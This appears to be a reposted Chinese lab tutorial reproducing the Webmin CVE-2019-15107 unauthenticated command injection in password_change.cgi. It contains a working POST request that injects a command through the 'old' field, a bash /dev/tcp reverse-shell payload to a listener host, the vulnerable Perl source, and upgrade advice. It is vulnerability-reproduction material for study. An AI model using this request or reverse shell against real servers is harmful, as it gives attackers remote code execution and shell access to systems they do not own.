Webmin (CVE-2019-15107) 远程命令执行漏洞复现

2023-10-15 03:04

本文主要是介绍Webmin (CVE-2019-15107) 远程命令执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • Webmin 远程命令执行漏洞
    • 1. 漏洞编号
    • 2. 漏洞描述
    • 3. 影响版本
    • 4. 利用方法(利用案例)
      • 4.1 启动环境
      • 4.2 漏洞复现
      • 4.3 深度利用
      • 4.4 漏洞原因
    • 5. 附带文件
    • 6. 加固建议
    • 7. 参考信息
    • 8. 漏洞分类

Webmin 远程命令执行漏洞

1. 漏洞编号

CVE-2019-15107

2. 漏洞描述

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

3. 影响版本

漏洞影响版本为Webmin<=1.920

4. 利用方法(利用案例)

4.1 启动环境

image-20231012170055010

访问靶场地址https://127.0.0.1:10000/

image-20231012170839696

访问https://127.0.0.1:10000/password_change.cgi

image-20231012190358098

4.2 漏洞复现

可以使用bp抓包然后修改数据包的方式

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

还可以使用HackBar,发送POST请求包,并添加攻击Payload

image-20231012190637087

然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。

4.3 深度利用

尝试执行反弹shell命令

先将payload进行URL编码

bash -c "bash -i >& /dev/tcp/192.168.188.185/4444 0>&1"

image-20231012191702397

kali监听4444端口,发送数据包

image-20231012191655140

kali反弹成功

image-20231012191721087

4.4 漏洞原因

出问题的地方就是这个password_change.cgi

  1 #!/usr/bin/perl2 # password_change.cgi3 # Actually update a user's password by directly modifying /etc/shadow4 5 BEGIN { push(@INC, "."); };6 use WebminCore;7 8 $ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";9 &init_config();10 &ReadParse();11 &get_miniserv_config(\%miniserv);12 $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";13 14 # Validate inputs15 $in{'new1'} ne '' || &pass_error($text{'password_enew1'});16 $in{'new1'} eq $in{'new2'} || &pass_error($text{'password_enew2'});17 18 # Is this a Webmin user?19 if (&foreign_check("acl")) {20         &foreign_require("acl", "acl-lib.pl");21         ($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();22         if ($wuser->{'pass'} eq 'x') {23                 # A Webmin user, but using Unix authentication24                 $wuser = undef;25                 }26         elsif ($wuser->{'pass'} eq '*LK*' ||27                $wuser->{'pass'} =~ /^\!/) {28                 &pass_error("Webmin users with locked accounts cannot change ".29                             "their passwords!");30                 }31         }32 if (!$in{'pam'} && !$wuser) {33         $miniserv{'passwd_cindex'} ne '' && $miniserv{'passwd_mindex'} ne '' ||34                 die "Missing password file configuration";35         }37 if ($wuser) {38         # Update Webmin user's password39         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});40         $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);41         $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});42         $perr && &pass_error(&text('password_enewpass', $perr));43         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});44         $wuser->{'temppass'} = 0;45         &acl::modify_user($wuser->{'name'}, $wuser);46         &reload_miniserv();47         }48 elsif ($gconfig{'passwd_cmd'}) {49         # Use some configured command50         $passwd_cmd = &has_command($gconfig{'passwd_cmd'});51         $passwd_cmd || &pass_error("The password change command <tt>$gconfig{'passwd_cmd'}</tt> was not found");52 53         &foreign_require("proc", "proc-lib.pl");54         &clean_environment();55         $ENV{'REMOTE_USER'} = $in{'user'};      # some programs need this56         $passwd_cmd .= " ".quotemeta($in{'user'});57         ($fh, $fpid) = &proc::pty_process_exec($passwd_cmd, 0, 0);58         &reset_environment();59         while(1) {60                 local $rv = &wait_for($fh,61                            '(new|re-enter).*:',62                            '(old|current|login).*:',63                            'pick a password',64                            'too\s+many\s+failures',65                            'attributes\s+changed\s+on|successfully\s+changed',66                            'pick your passwords');67                 $out .= $wait_for_input;68                 sleep(1);69                 if ($rv == 0) {

5. 附带文件

6. 加固建议

漏洞修复:

  • 升级到1.930版本

  • 在github上下载password_change.cgi文件

7. 参考信息

参考信息

  • Vulhub - Docker-Compose file for vulnerability environment。

  • exploit-db.com/exploits/47230

  • Webmin 0day 远程代码执行 (firosolutions.com)

8. 漏洞分类

远程命令执行漏洞(RCE)

这篇关于Webmin (CVE-2019-15107) 远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


原文地址:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.chinasem.cn/article/214950

相关文章

C#实现访问远程硬盘的图文教程

《C#实现访问远程硬盘的图文教程》在现实场景中,我们经常用到远程桌面功能,而在某些场景下,我们需要使用类似的远程硬盘功能,这样能非常方便地操作对方电脑磁盘的目录、以及传送文件,这次我们将给出一个完整的... 目录引言一. 远程硬盘功能展示二. 远程硬盘代码实现1. 底层业务通信实现2. UI 实现三. De

MySQL中SQL的执行顺序详解

《MySQL中SQL的执行顺序详解》:本文主要介绍MySQL中SQL的执行顺序,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录mysql中SQL的执行顺序SQL执行顺序MySQL的执行顺序SELECT语句定义SELECT语句执行顺序总结MySQL中SQL的执行顺序

SQLyog中DELIMITER执行存储过程时出现前置缩进问题的解决方法

《SQLyog中DELIMITER执行存储过程时出现前置缩进问题的解决方法》在SQLyog中执行存储过程时出现的前置缩进问题,实际上反映了SQLyog对SQL语句解析的一个特殊行为,本文给大家介绍了详... 目录问题根源正确写法示例永久解决方案为什么命令行不受影响?最佳实践建议问题根源SQLyog的语句分

Android实现两台手机屏幕共享和远程控制功能

《Android实现两台手机屏幕共享和远程控制功能》在远程协助、在线教学、技术支持等多种场景下,实时获得另一部移动设备的屏幕画面,并对其进行操作,具有极高的应用价值,本项目旨在实现两台Android手... 目录一、项目概述二、相关知识2.1 MediaProjection API2.2 Socket 网络

Linux命令之firewalld的用法

《Linux命令之firewalld的用法》:本文主要介绍Linux命令之firewalld的用法,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux命令之firewalld1、程序包2、启动firewalld3、配置文件4、firewalld规则定义的九大

Linux之计划任务和调度命令at/cron详解

《Linux之计划任务和调度命令at/cron详解》:本文主要介绍Linux之计划任务和调度命令at/cron的使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux计划任务和调度命令at/cron一、计划任务二、命令{at}介绍三、命令语法及功能 :at

Linux ls命令操作详解

《Linuxls命令操作详解》通过ls命令,我们可以查看指定目录下的文件和子目录,并结合不同的选项获取详细的文件信息,如权限、大小、修改时间等,:本文主要介绍Linuxls命令详解,需要的朋友可... 目录1. 命令简介2. 命令的基本语法和用法2.1 语法格式2.2 使用示例2.2.1 列出当前目录下的文

Spring Boot项目部署命令java -jar的各种参数及作用详解

《SpringBoot项目部署命令java-jar的各种参数及作用详解》:本文主要介绍SpringBoot项目部署命令java-jar的各种参数及作用的相关资料,包括设置内存大小、垃圾回收... 目录前言一、基础命令结构二、常见的 Java 命令参数1. 设置内存大小2. 配置垃圾回收器3. 配置线程栈大小

Ubuntu中远程连接Mysql数据库的详细图文教程

《Ubuntu中远程连接Mysql数据库的详细图文教程》Ubuntu是一个以桌面应用为主的Linux发行版操作系统,这篇文章主要为大家详细介绍了Ubuntu中远程连接Mysql数据库的详细图文教程,有... 目录1、版本2、检查有没有mysql2.1 查询是否安装了Mysql包2.2 查看Mysql版本2.

Spring定时任务只执行一次的原因分析与解决方案

《Spring定时任务只执行一次的原因分析与解决方案》在使用Spring的@Scheduled定时任务时,你是否遇到过任务只执行一次,后续不再触发的情况?这种情况可能由多种原因导致,如未启用调度、线程... 目录1. 问题背景2. Spring定时任务的基本用法3. 为什么定时任务只执行一次?3.1 未启用